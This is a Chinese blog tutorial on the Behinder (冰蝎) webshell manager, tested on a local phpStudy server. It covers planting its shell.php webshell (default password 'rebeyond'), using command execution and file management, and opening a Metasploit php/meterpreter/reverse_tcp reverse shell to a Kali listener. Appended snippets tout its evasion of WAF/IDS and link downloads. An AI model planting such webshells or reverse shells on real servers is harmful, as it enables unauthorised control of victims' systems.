冰蝎使用

最新推荐文章于 2025-04-09 16:45:57 发布
最新推荐文章于 2025-04-09 16:45:57 发布
阅读量1.8w 收藏 62
点赞数 14
分类专栏: 工具
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bring_coco/article/details/114302178
版权

一.启动

Windows环境下:
1.配置环境:冰蝎只支持jre6-jre8
可以在电脑上查看java版本
命令:java -version
在这里插入图片描述
2.启动
在冰蝎目录下命令行输入
命令:java -jar Behinder_v3.0_Beta6_win.jar(这里文件名可简化)
在这里插入图片描述
即可开启
Linux环境下:
注意切换jdk版本6-8,对应javac版本也要和java版本相同,同理打开冰蝎目录输入命令

二.使用(在本机进行实测)

环境:phpStudy+冰蝎

通过启动phpStudy,访问本机地址
在这里插入图片描述
成功访问说明环境已经搭建成功
在这里插入图片描述
在网站根目录下创建一个shell2.php的php文件,文件内容需要我们下载的冰蝎server中带有的shell.php文件中的内容复制过去
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
可以看到默认连接密码为rebeyond
这时通过冰蝎去连接该文件
在这里插入图片描述
输入URL和密码即可
在这里插入图片描述
点击此URL
在这里插入图片描述
可以看到成功连接,此时已经把基本信息显示出来了

三.模块介绍

1.基本信息

直接显示出phpinfo,通过此表可以用来信息收集

2.命令执行

在这里插入图片描述

3.虚拟终端

在这里插入图片描述
也可以进行cmd.exe,powershell.exe等功能

4.文件管理

在这里插入图片描述
可以操作管理文件

5.内网渗透

在这里插入图片描述

6.反弹shell

这里演示利用kali虚拟机作监听
Kali(10.0.78.17)
本机(10.0.78.14)
(1)首先打开msf,设置监听
命令:use exploit/multi/handler
set payload php/meterpreter/reverse_tcp(主要此时的paload)
在这里插入图片描述
接下来设置参数
命令:show options
在这里插入图片描述
可以看到只需要设置LHOST即可
命令:set LHOST 10.0.78.17
在这里插入图片描述
然后exploit执行
跳转到冰蝎界面,输入对应ip地址及端口,点击给我连
在这里插入图片描述
查看结果
在这里插入图片描述
成功返回meterpreter

7.管理数据库

在这里插入图片描述
冰蝎原理参考:https://xz.aliyun.com/t/2774

网络安全工具冰蝎(behinder)3.0使用教程
SHELLCODE_8BIT的博客
09-13 3836
输入我们上传的地址,之后密码填写rebeyond。我的是java所以选择shell.jsp。将server中的文件上传。
冰蝎behinder4.0使用教程网络安全工具使用教程
SHELLCODE_8BIT的博客
09-02 1895
点击生成服务端后就会根据相应传输协议,生成不同语言的webshell。将webshell放置在网站目录中,我的是tomcat,所以放置在。填写脚本类型和传输协议,我的环境为jsp何default_xor。对该条目右键打开,弹出下列信息则说明连接成功。2.选择协议名称,目前有如下几种传输协议。完成添加后,会看到一条新增的网站信息。不同web组件会有不同的目录。对空白处点击新增按钮。
打点神器behinder(冰蝎使用教程-踩坑版
weixin_69925635的博客
05-29 1157
使用命令java -jar Behinder.jar启动后如果java版本过高会报错缺少javafx,但在高版本java环境下安装会有点麻烦,所以安装一个jdk1.8进行替换更好。lhost设置为kali的ip,端口9527,并将这些信息也填在刚刚behinder建立的连接中。点击给我连,msf中exploit该漏洞,可以看到成功反弹shell。在msf中有这个漏洞,因此可以利用msf和behinder联动。将该文件利用靶机dvwa文件上传的漏洞进行上传。在攻击机上安装kali,安装完成后如下图所示。
一文详解动态加密通信流量的新型Webshell客户端—冰蝎Behinder的使用教程!
最新发布
资深程序员,曾自学JAVA,C#,如今从业于网安行业
04-09 658
无论用哪种语言,同一个名称的传输协议,本地和远程的加解密逻辑应该是一致的,这样才能实现本地加密后,远程可以成功解密,远程加密后,本地同样也可以解密(因此如果修改默认的aes协议的key,则需要同时修改本地和远程的加密函数和加密函数中的key)冰蝎与webshell建立连接的同时,javaw也与目的主机建立tcp连接,每次连接使用本地端口在49700左右(就是比较大的端口),每连接一次,每建立一次新的连接,端口就依次增加。功能,让用户对流量的加密和解密进行自定义,实现流量加解密协议的去中心化。
冰蝎简单使用
00勇士王子的博客
04-29 1万+
冰蝎介绍   Webshell管理工具,动态二进制加密网站客户端。流量动态加密,攻击特征安全设备(WAF、WebIDS)难以检测。   冰蝎通信过程中使用AES(高级加密算法,对称加密,微信小程序使用此种方法)进行加密,Java和.NET默认支持AES,php中需要开启openssl扩展,在V2.0版本后,php环境方式根据服务端支持情况动态选择,使得冰蝎更强大。 常规使用   因为是自己练习,所以直接用phpstudy在本地上传一个shell。   冰蝎安装目录下有官方自带的几个shell 我将shell
webshell管理工具-冰蝎(Behinder)的安装和基础使用(msf联动,流量特征)
wangluoanquan111的博客
02-26 2121
冰蝎是一款基于Java开发的动态加密通信流量的新型Webshell客户端,由于通信流量被加密,传统的WAF、IDS 设备检测,给威胁狩猎带来较大挑战。冰蝎其最大特点就是对交互流量进行对称加密,且加密密钥是由随机数函数动态生成,因此该客户端的流量几乎无法检测。在流量层,冰蝎的aes特征一直是厂商查杀的重点,在主机层,aes相关的API也是一个强特征。既然是特征,那就一定存在一个一成不变的常量,那我们就把这个特征泛化一下,让他成为变量。为了一劳永逸解决这个问题,
冰蝎常规使用
热门推荐
初学者L_言的博客
04-24 2万+
环境搭建 Web服务器: 本地 win2003(phpstudy搭建) 攻击工具: 冰蝎+kali 具体实施步骤 1、上传webshell 原理参考——>点击 和普通一句话木马类似,需要连接密码。此处为 pass <?php @error_reporting(0); session_start(); if (isset($_GET['pass'])) { $key=substr...
冰蝎V4.1Behinder
03-11
使用冰蝎V4.1 Behinder时,安全专业人员应严格遵守法规和道德准则,只应用于授权的测试环境,避免对正常网络服务造成影响。同时,了解和熟练掌握这款工具的各项功能,有助于提升网络安全防护和漏洞发现的能力。
Webshell工具-冰蝎4.0配置及使用
归零者的博客
07-07 1927
冰蝎webshell管理工具用作webshell的连接,4.0版本带自加密功能。要求运行环境jre1.8。
冰蝎Bhinder下载安装包
09-26
冰蝎(Bhinder)动态二进制加密网站管理客户端。基于JAVA,需要安装jre,可以跨平台使用。主要功能为:基本信息、命令执行、虚拟终端、文件管理、Socks代理、反弹shell、数据库管理、自定义代码等。
冰蝎v2.0.1.zip
05-19
冰蝎webshell连接工具,无毒无后门,可放心使用
冰蝎的原理与安装使用
weixin_59047731的博客
03-11 2694
冰蝎是一款基于Java开发的动态加密通信流量的新型Webshell客户端,由于通信流量被加密,传统的WAF、IDS 设备难以检测,给威胁狩猎带来较大挑战。冰蝎其最大特点就是对交互流量进行对称加密,且加密密钥是由随机数函数动态生成,因此该客户端的流量几乎无法检测。而老牌的如中国菜刀因为其流量特征太过明显,从而使用的场景越来越少。不过在此还是要致敬前辈的贡献。
冰蝎软件的配置与应用
weixin_45711977的博客
10-27 7931
冰蝎
冰蝎的安装使用(附文件)
qq_74263993的博客
11-19 950
链接1: https://pan.baidu.com/s/1L0l0xZHonlzM_EY8pyEkvg?3. 进入文件,看看是否有这些文件,data.db可能一开始没有,因为你还没有数据,主要看看有没有Behinder.jar文件。链接2:https://drive.uc.cn/s/10c3cd695e614?链接3:https://pan.quark.cn/s/778389c4588f。5.回车后会发现打开了终端,接着输入java执行命令就好了。(java环境自己去搭建吧,我这里就不教了。
冰蝎的安装和使用
weixin_51641247的博客
04-06 6941
相对于菜刀和蚁剑,冰蝎的特点是动态二进制加密实现新型一句话木马,它的数据是加密传输的,右键空白处新增,输入webshell信息,若使用冰蝎自带的webshell则默认密码为rebeyond冰蝎提供asp、c#、php、Java的自定义代码执行功能,文本框支持语法高亮,c#和Java会把输入的源代码自动编译并执行。
冰蝎-Webshell管理工具
weixin_66717977的博客
06-30 1万+
冰蝎超详解,新手食用
32_behinder(冰蝎)
qq_45301512的博客
02-04 2813
有时候这个jd-gui工具无法打开文件,我们可以放一些其它的文件,例如我随便找的一个ArcTest.class文件,只要打开这个,agent.class也可以查看。防检测功能未生效,这里可能是软件功能没制作好,或者可能是只能防止部分软件检测,而恰好findshell不能防。或者停止服务器,再使用jps命令,对比发现少了哪个PID,快速判断目标JVM的PID。点击注入内存马之后,注入类型选择agent,路径点击默认的,然后修改文件名。保存之后,点击上方的生成服务端,会自动弹出shell.jsp存放的文件夹。
冰蝎4.1使用教程
03-10
好的,我现在要处理用户关于查找冰蝎4.1使用教程的请求。首先,我需要确认用户提到的“冰蝎4.1”具体指的是什么。冰蝎通常指的是一款网络安全工具,主要用于渗透测试,作为Webshell管理工具。用户可能想要了解如何...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值